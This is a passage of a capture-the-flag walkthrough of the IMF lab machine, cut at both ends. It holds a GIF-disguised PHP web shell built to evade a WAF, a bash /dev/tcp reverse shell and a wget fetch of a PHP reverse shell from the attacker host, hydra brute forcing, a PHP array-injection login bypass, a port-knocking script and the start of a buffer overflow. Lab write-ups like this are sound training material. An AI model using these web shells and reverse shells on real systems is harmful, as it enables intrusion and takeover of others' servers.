and my Kali is 192.168.0.11

root@kali:~/boxes/imf# dotdotpwn -m http -h 192.168.1.18 -M POST
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# – DotDotPwn v3.0.2 – #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################

[+] Report name: Reports/192.168.1.18_09-19-2019_10-21.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.18
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 11028

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Fuzz testing finished after 2.15 minutes (129 seconds)
[+] Total Traversals found (so far): 0
[-] Web server (192.168.1.18) didn’t respond !

Let’s go back to the first flag that says allthefiles….
So I checked the source of the page and found some js scripts with weird names:

<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>

It looks like base64! Concatenating the three names and decoding gives:

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

Base64 decoded again, it is imfadministrator

So I tried: http://192.168.0.18/imfadministrator/

and got a login page!

[screenshot: login page]

The page source is interesting... now I have a name!

<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>

Let’s see if this can be injected:

sqlmap -u "http://192.168.0.18/imfadministrator" --data "user=erik&pass=password" --dbs --threads=10 --random-agent --dbms mysql

Seems it is not injectable...

I tried hydra but no result for now..

Let's try roger and test.

Interesting:
[screenshot]

So I went back to the contact page and tried different names I found. Nothing.
Then I see that Roger’s name is

Roger S. Michaels

So if I try rmichaels:

[screenshot]

So rmichaels is the user…
I can now retry hydra:

root@kali:~/boxes/imf# hydra -l rmichaels -P /usr/share/seclists/Passwords/darkc0de.txt 192.168.0.18 http-post-form "/imfadministrator:user=^USER^&pass=^PASS^:S=302"
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-19 13:56:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1471056 login tries (l:1/p:1471056), ~91941 tries per task
[DATA] attacking http-post-form://192.168.0.18:80/imfadministrator:user=^USER^&pass=^PASS^:S=302

[80][http-post-form] host: 192.168.0.18 login: rmichaels password: 017731264n6

1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-19 13:56:39

Didn’t work!!!!!

So the code is in PHP….

After a lot of googling, I found this:
https://stackoverflow.com/questions/1885979/php-get-variable-array-injection

So I tried with Burp:

POST /imfadministrator/ HTTP/1.1
Host: 192.168.0.18
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.18/imfadministrator/
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=7colm2p1mfl8ga2tev7ne6rlj0
Connection: close
Upgrade-Insecure-Requests: 1

user=rmichaels&pass[]=

Bingo!

HTTP/1.1 200 OK
Date: Thu, 19 Sep 2019 17:16:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 100
Connection: close
Content-Type: text/html; charset=UTF-8

flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href='cms.php?pagename=home'>IMF CMS</a>

The flag decodes to continueTOcms.

Now if I go back to Firefox:

[screenshots not preserved]

The Disavowed List link leads to an image (screenshot not preserved).

Upload Report says: In construction

Nothing in the REDACTED image:

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract redacted.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

sqlmap --url http://192.168.0.18/imfadministrator/cms.php?pagename=home --dump --method POST

Found another page in the database (table pages)
http://192.168.0.18/imfadministrator/cms.php?pagename=tutorials-incomplete
[screenshot not preserved]

There's a QR code in the picture; it holds flag 4:

flag4{dXBsb2Fkcjk0Mi5waHA=}

Decoded, we have: uploadr942.php

[screenshot not preserved]

I tried to upload a PHP reverse shell:

Intelligence Upload Form

Error: Invalid file type.

So i renamed it to .jpg:

Intelligence Upload Form

Error: CrappyWAF detected malware. Signature: exec function php detected

OK, so I need to hide my code!

Let's try a GIF and no exec(): the GIF89a magic bytes at the start of the file should satisfy a content-based file-type check, and the backtick operator runs a command without naming exec, system or shell_exec, so the WAF signature has nothing to match:

GIF89a
<?php $cmd=$_GET['cmd']; print(`$cmd`); ?>

I uploaded 1234.gif and it worked.. but when I try to find the file, I have a 404.

So let’s go back to the upload page result:

<html>
<head>
<title>File Uploader</title>
</head>
<body>
<h1>Intelligence Upload Form</h1>
File successfully uploaded.
<!-- 6037118aaa39 --><form id="Upload" action="" enctype="multipart/form-data" method="post">
<p>
<label for="file">File to upload:</label>
<input id="file" type="file" name="file">
</p>

<p>
<input id="submit" type="submit" name="submit" value="Upload">
</p>
</form>

</body>
</html>

It seems it renamed my file, and the HTML comment leaks the new name!

So let’s try to browse to:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=id

Bingo, I have code execution! (For a .gif to be run as PHP at all, the uploads directory's .htaccess, visible in the listing below, presumably maps that extension to the PHP handler; its contents aren't shown here.)

If I do an ls%20-al:

GIF89a
total 108
drwxr-xr-x 2 www-data www-data 4096 Sep 20 11:55 .
drwxr-xr-x 4 www-data www-data 4096 Oct 17 2016 ..
-rw-r--r-- 1 www-data www-data 82 Oct 12 2016 .htaccess
-rw-r--r-- 1 www-data www-data 50 Sep 20 11:53 3da1c1eeec42.gif
-rw-r--r-- 1 www-data www-data 50 Sep 20 11:55 6037118aaa39.gif
-rw-r--r-- 1 www-data www-data 83407 Sep 20 11:36 b2634466ab8e.jpg
-rw-r--r-- 1 www-data www-data 28 Oct 12 2016 flag5_abc123def.txt

As you can see I did try multiple times!!!!!!

So let’s catch the flag first:

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=cat%20flag5_abc123def.txt

flag5{YWdlbnRzZXJ2aWNlcw==}
It decodes to agentservices.

Checking the kernel; the query string below is just uname -a, URL-encoded:

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%75%6e%61%6d%65%20%2d%61

GIF89aLinux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Let's try a bash reverse shell now:

/bin/sh -i >& /dev/tcp/192.168.0.11/8080 0>&1

URL encoded:

%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%27%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31%27

Didn't work! The backtick operator hands the command to /bin/sh -c, and on Ubuntu /bin/sh is dash, which has no /dev/tcp pseudo-device and does not understand the >& redirection; wrapping the whole string in single quotes (the %27s) also makes the shell look for a single command with that entire name. Invoking bash explicitly (bash -c '...') is the usual fix.

Let's try differently:

I have the PHP reverse shell from pentestmonkey (reverse2.php, with the callback set to 192.168.0.11:4444):

So I started an http server on kali:

python -m SimpleHTTPServer 9000

Then on the target, fetch it through the webshell (its working directory is the uploads folder, so that's where the file lands):
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=wget%20192.168.0.11:9000/reverse2.php

Then on kali, I start netcat:

nc -nvlp 4444

Then on the target:
192.168.0.18/imfadministrator/uploads/reverse2.php

Bingo! A shell!

root@kali:~/tools/shells# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 53416
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
13:03:49 up 24 min, 0 users, load average: 0.15, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off

Now upgrading to a proper TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL Z
stty raw -echo
fg and two times ENTER

export TERM=screen
reset

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
setup:x:1000:1000:setup,,,:/home/setup:/bin/bash

Let's go back to the website for now to look for passwords. In index.php I found:

398fj289fj2389fj398fjhhds^&#hkseifw3893h#(&$$*838hjf

for rmichaels. This was the hard-coded password.
But rmichaels is not in /etc/passwd, so it's useless for a local login!

Uploading LinEnum to the target, then running it:

$ wget http://192.168.0.11/linenum.sh
--2019-09-23 07:45:31-- http://192.168.0.11/linenum.sh
Connecting to 192.168.0.11:80… failed: Connection refused.
$ wget http://192.168.0.11:9000/linenum.sh
--2019-09-23 07:45:45-- http://192.168.0.11:9000/linenum.sh
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

0K ………. ………. ………. ………. …. 100% 132K=0.3s

2019-09-23 07:45:45 (132 KB/s) – ‘linenum.sh’ saved [45652/45652]

$ chmod +x linenum.sh
$ ./linenum.sh -t > scan.txt

### SYSTEM ##############################################
[-] Kernel information:
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x8
6_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-45-generic (buildd@lgw01-34) (gcc version 5.4.0 20160609 (Ub
untu 5.4.0-6ubuntu1~16.04.2) ) #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04.1 LTS”
NAME=”Ubuntu”
VERSION=”16.04.1 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04.1 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
UBUNTU_CODENAME=xenial

Checking exploit-db for a matching kernel exploit.
Tried: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

Not working..

Interesting process:

root 1086 2.8 0.2 8752 2196 ? Ss 07:39 0:12 /usr/sbin/knockd -d

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –

Now the problem is that I cannot read knockd.conf, so the knock sequence is unknown....

knockd -l
/etc/knockd.conf: Permission denied

The xinetd config explains what is behind port 7788: a service that runs /usr/local/bin/agent as root.

www-data@imf:/etc/xinetd.d$ cat agent
# default: on
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}

Hmm, actually if I telnet to port 7788, I get something!

telnet localhost 7788
Trying ::1...
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID :

But I can't log in without a valid Agent ID....

Let's look at the binary behind the service:

www-data@imf:/usr/local/bin$ ll
total 24
drwxr-xr-x 2 root root 4096 Oct 16 2016 .
drwxr-xr-x 10 root root 4096 Sep 22 2016 ..
-rw-r--r-- 1 root root 19 Oct 16 2016 access_codes
-rwxr-xr-x 1 root root 11896 Oct 12 2016 agent

www-data@imf:/usr/local/bin$ cat access_codes
SYN 7482,8279,9467

Hmm, I might have the knock sequence here! One caveat before sending it with nmap: nmap scans ports in random order unless you pass -r, so without -r the three SYNs are not guaranteed to arrive in this sequence.

nmap -sS --max-retries 0 -T5 -p 7482,8279,9467 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:53 UTC
Warning: 192.168.0.18 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.18
Host is up (0.00043s latency).

PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
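An added example, not part of the original write-up: a small Python knocker that parses the access_codes format found above and sends the SYNs strictly in order, which nmap does not guarantee without -r. A plain connect() to a filtered port emits exactly one SYN and then times out, which is all knockd needs to see. It assumes the SYN prefix corresponds to knockd's tcpflags = syn setting (the config file could not be read, so that is an assumption) and uses the target address from this write-up.

```python
import socket
import time


def parse_access_codes(text):
    """Parse the access_codes format seen on the box: '<FLAG> p1,p2,p3'.

    Returns (flag, [ports]), e.g. ('SYN', [7482, 8279, 9467]).
    """
    flag, _, ports = text.strip().partition(" ")
    if not ports:
        raise ValueError("expected '<FLAG> port,port,...'")
    return flag.upper(), [int(p) for p in ports.split(",")]


def knock(host, ports, delay=0.2, timeout=0.3):
    """Send one SYN per port, strictly in the given order.

    connect() to a filtered port sends the SYN and then times out; that
    timeout is expected. The small delay keeps the packets in sequence
    even if the host replies slowly.
    """
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except (socket.timeout, OSError):
            pass  # filtered or closed: the SYN was still sent
        finally:
            s.close()
        time.sleep(delay)


def is_open(host, port, timeout=1.0):
    """True if a full TCP connect succeeds; use it to confirm the knock took effect."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except (socket.timeout, OSError):
        return False
    finally:
        s.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.18"  # IMF box address from the write-up
    flag, sequence = parse_access_codes("SYN 7482,8279,9467")     # contents of access_codes above
    print("knocking %s with %s sequence %s" % (target, flag, sequence))
    knock(target, sequence)
    print("7788 open after knock:", is_open(target, 7788))
```

Run it as `python3 knock.py 192.168.0.18`; if the sequence is right, the port check at the end flips to True within knockd's timeout window.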

And now if I rescan the target:

root@kali:~/boxes/imf# nmap -p- 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:54 UTC
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

But it just presents me with what I already had (80 and 7788). So, useless.

Going back to agent. I tried to transfer it to my Kali box with a Python HTTP server, but somehow it didn't work, so:

cp agent /var/www/html/imfadministrator/uploads

Then I downloaded it through the browser, since Apache serves that directory....
Now let's look at it in a debugger:

I ran it under edb and set a breakpoint where the Agent ID is checked:

[screenshot not preserved]

And the expected code is sitting on the stack: 48093572

I tried it on the target, and it worked!

www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:

Extraction Points:
Staatsoper, Vienna, Austria
Blenheim Palace, Woodstock, Oxfordshire, England, UK
Great Windmill Street, Soho, London, England, UK
Fawley Power Station, Southampton, England, UK
Underground Station U4 Schottenring, Vienna, Austria
Old Town Square, Old Town, Prague, Czech Republic
Drake Hotel – 140 E. Walton Pl., Near North Side, Chicago, Illinois, USA
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
www-data@imf:/usr/local/bin$ 2
2: command not found
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 2

Extraction Request
Enter extraction location: Underground Station U4 Schottenring, Vienna, Austria
e
Location: Underground Station U4 Schottenring, Vienna, Austria

Extraction team has been deployed.

www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: 1234
Report: 1234
Submitted for review.

Trying a buffer overflow.

First, on the Kali box, disable ASLR so stack addresses stay stable between debugger runs (root required):
echo 0 > /proc/sys/kernel/randomize_va_space

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Segmentation fault (core dumped)

BINGO!

So running it with GDB on Kali:

Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 (‘a’ <repeats 152 times>, “T\322\377\377”, ‘a’ <repeats 44 times>…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x61616161 (‘aaaa’)
ESP: 0xffffd300 (‘a’ <repeats 200 times>…)
EIP: 0x61616161 (‘aaaa’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x61616161
[————————————stack————————————-]
0000| 0xffffd300 (‘a’ <repeats 200 times>…)
0004| 0xffffd304 (‘a’ <repeats 200 times>…)
0008| 0xffffd308 (‘a’ <repeats 200 times>…)
0012| 0xffffd30c (‘a’ <repeats 200 times>…)
0016| 0xffffd310 (‘a’ <repeats 200 times>…)
0020| 0xffffd314 (‘a’ <repeats 200 times>…)
0024| 0xffffd318 (‘a’ <repeats 200 times>…)
0028| 0xffffd31c (‘a’ <repeats 200 times>…)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()

So I create a unique pattern using Metasploit:

root@kali:~/boxes/imf# /usr/bin/msf-pattern_create -l 300 > unique.txt

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.

Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
